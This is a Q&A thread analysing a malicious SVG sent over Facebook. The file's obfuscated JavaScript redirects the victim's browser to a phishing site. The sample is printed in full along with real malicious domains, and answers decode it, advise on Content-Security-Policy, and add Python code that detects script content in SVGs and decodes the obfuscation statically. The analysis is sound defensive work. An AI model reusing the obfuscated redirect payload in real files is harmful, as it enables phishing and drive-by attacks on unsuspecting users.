Malicious JavaScript embedded in SVG - what does it do?
I received a Facebook message with two files (SVG pictures), and I clicked one of them (I do not know why :( ). Then a new tab with a red dot opened, and I was immediately redirected to some site pretending to look like YouTube (http://kerman.pw/?fb_dsa).

Then I downloaded the .svg file using the "Save link as..." function. It seems to be some JavaScript code embedded into the SVG, so I am posting it here (I do not know JS very well):

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
    // Decoder: substitutes each character through one of six rotating
    // tables, then drops the first hzrgh characters of the result.
    function xcxxy(gyqbv,hzrgh,ktjrf){
      var qixua = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6";
      var vyqsvo = ["rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn","RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm","n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s","C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey","9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p"];
      var bnkdip = "";
      var igrqm = 0;
      while(vyqsvo[igrqm]){   // igrqm = number of substitution tables (6)
        igrqm++;
      }
      var kwwtmh = 0;
      while(gyqbv[kwwtmh]){
        var jikaig = 0;
        var axfnq = -1;
        while(qixua[jikaig]){   // is the input character in the base alphabet?
          if(qixua[jikaig] == gyqbv[kwwtmh]){
            axfnq = jikaig;
            break;
          }
          jikaig++;
        }
        if(axfnq >= 0){
          var abxnk = 0;
          var wjtfca = -1;
          while(vyqsvo[kwwtmh%igrqm][abxnk]){   // find it in the table for this position (mod 6)
            if(vyqsvo[kwwtmh%igrqm][abxnk] == gyqbv[kwwtmh]){
              wjtfca = abxnk;
              break;
            }
            abxnk++;
          }
          bnkdip += qixua[wjtfca];   // map that index back through the base alphabet
        }else{
          bnkdip += gyqbv[kwwtmh];   // characters outside the alphabet pass through
        }
        kwwtmh++;
      }
      var evhrt = "";
      for(izqfrv=hzrgh;izqfrv<bnkdip.length;izqfrv++){   // drop the first hzrgh characters
        evhrt += bnkdip[izqfrv];
      }
      bnkdip = evhrt;
      return bnkdip;
    }
    // The four decoded strings are assembled into a property assignment on window.
    var obejok = window;
    var iyysri = xcxxy("sUTA:Gkb106SzH",11,false);
    var leizjp = xcxxy("kBB?5S:Uh",1,false);
    var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false);
    obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false);
  ]]></script>
</svg>

I don't really know JavaScript, and I wanted to ask what it can do. Could it hurt me? Thank you very much.

Luminal answered 20/11, 2016 at 22:54 Comment(6)
Don't you have that "YouTube look-alike" in your browser history? - Sweater
window.top.location.href = "http://mourid.com/php/trust.php", causing your browser to navigate to that address, which redirects you to various others. The script on its own can't hurt you, but using the site it ultimately takes you to may. Imitating YouTube, it may be trying to phish for your credentials or may try to serve a file that isn't a video. - Utah
@JimmyAdaro yes, I found it. It is: http://kerman.pw/?fb_dsa . - Luminal
Can I ask why the downvote, so I can avoid it in the future? - Luminal
I also found some information about it; it seems it is a new threat. In English: bartblaze.blogspot.cz/2016/11/… In Polish (but Google translates it well): niebezpiecznik.pl/post/… - Luminal
FYI - if you serve user-uploaded SVGs from your own domain (which maybe you shouldn't), sending the header Content-Security-Policy:default-src *; would say to the browser "you can load scripts, images, or whatever else from any URL you want, but don't execute inline code in <script> tags". It's a very (probably overly) permissive CSP, but would prevent malicious SVGs from doing damage. See content-security-policy.com - Peril
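The comments above come down to one defensive point: an SVG is XML that can carry active content (a <script> element, on* event-handler attributes, javascript: URLs), so anything that accepts SVG uploads should check for those features before serving the file. The check below is an added example, not code from the thread; it uses only the standard library, and the three SVG inputs are constructed for the test (the first mirrors the shape of the file in the question with a placeholder URL).

```python
# Added example: flag the script-bearing features an uploaded SVG can carry.
# Standard library only; for untrusted XML in production prefer defusedxml,
# which hardens the parser against entity-expansion and external-entity tricks.
import xml.etree.ElementTree as ET


def svg_active_content(svg_bytes: bytes) -> list:
    """Return a list of findings; an empty list means nothing script-like was seen."""
    findings = []
    root = ET.fromstring(svg_bytes)
    for el in root.iter():
        tag = el.tag.split("}")[-1]  # strip the {namespace} prefix ElementTree adds
        if tag == "script":
            findings.append("script element")
        for name, value in el.attrib.items():
            local = name.split("}")[-1]  # xlink:href arrives as {xlink-ns}href
            if local.lower().startswith("on"):  # onload=, onclick=, onmouseover=, ...
                findings.append(f"event handler {local} on <{tag}>")
            if local == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL on <{tag}>")
    return findings


# Constructed inputs (not real samples): same shape as the file in the question,
# a handler/xlink variant, and a benign drawing.
SCRIPT_SVG = b"""<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
    window.top.location.href = "https://placeholder.invalid/";
  ]]></script>
</svg>"""
HANDLER_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" '
               b'xmlns:xlink="http://www.w3.org/1999/xlink" onload="f()">'
               b'<a xlink:href="javascript:g()"><circle r="1"/></a></svg>')
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="2"/></svg>'

if __name__ == "__main__":
    for label, data in (("script", SCRIPT_SVG), ("handler", HANDLER_SVG), ("benign", BENIGN_SVG)):
        print(label, "->", svg_active_content(data) or "clean")
```

A file that produces any finding should be rejected or, at minimum, served with Content-Disposition: attachment and a CSP that forbids inline script, as the last comment suggests.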

You are correct that the SVG file has embedded JavaScript. SVGs are vector graphic files which draw an image in the browser based on the instructions inside the file. The SVG you found contains obfuscated JavaScript to hide what is actually going on.

At a glance, from what I can see, it is a script to open a new browser window and load a new URL, so by itself it is not dangerous; it all depends on what website it is redirecting you to, and what scripts are set to kick off when you reach that website.

So in short, it CAN harm your computer given the assumption that the site you're being redirected to is malicious.

I hope that helps.

Palmary answered 20/11, 2016 at 23:19

The embedded script redirects your browser to the website http://mourid.com/php/trust.php, but the script alone is not malicious. The function xcxxy decodes obfuscated strings, and the final line of code is an obfuscated version of window["top"]["location"]["href"] = "http://mourid.com/php/trust.php", which redirects you to that site. I advise you not to run the script because obfuscation is sometimes used to hide malicious code from plain sight. (Source: Wikipedia)

Nicolette answered 6/7 at 23:57
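Following the advice above not to run the script, here is an added example (not from any of the answers) that re-implements the xcxxy decoder statically in Python, so the four literals can be recovered without loading the SVG in a browser. The alphabet and the six tables are copied from the sample; the "\/" escapes in the JS source are plain "/" characters.

```python
# Added example: static re-implementation of xcxxy() from the SVG in the question.
# Each input character at position i is looked up in table i % 6; its index there is
# mapped back through the base alphabet; then the first `skip` characters are dropped.
ALPHABET = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6"
TABLES = [
    "rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS/I0g_CL?pxAyn",
    "RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS/9lB7sexVm",
    "n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN/s",
    "C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl/dKa35rsX=Ey",
    "9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1/y=kFODRKN24c5oX37_hAIVg",
    ":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk/Pjch3CGLHJd9p",
]


def decode(encoded: str, skip: int) -> str:
    """Mirror xcxxy(encoded, skip, _): positional substitution, then drop `skip` leading chars."""
    out = []
    for pos, ch in enumerate(encoded):
        table = TABLES[pos % len(TABLES)]
        idx = table.find(ch)
        if ch in ALPHABET and idx >= 0:
            out.append(ALPHABET[idx])  # index in the rotating table -> base alphabet
        else:
            out.append(ch)  # characters outside the alphabet pass through unchanged
    return "".join(out)[skip:]


def decode_sample() -> dict:
    """Decode the four literals from the sample and show the statement they assemble."""
    obj = decode("sUTA:Gkb106SzH", 11)
    prop = decode("kBB?5S:Uh", 1)
    attr = decode(".Pi/MksB2n7jIta0d", 13)
    value = decode("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD", 3)
    return {
        "statement": f'window["{obj}"]["{prop}"]["{attr}"] = "{value}"',
        "url": value,
    }


if __name__ == "__main__":
    print(decode_sample()["statement"])
```

The same approach (port the decoder, never evaluate the sample) works for any string-table obfuscator of this kind; the recovered URL is the only piece worth blocking or hunting for in proxy logs.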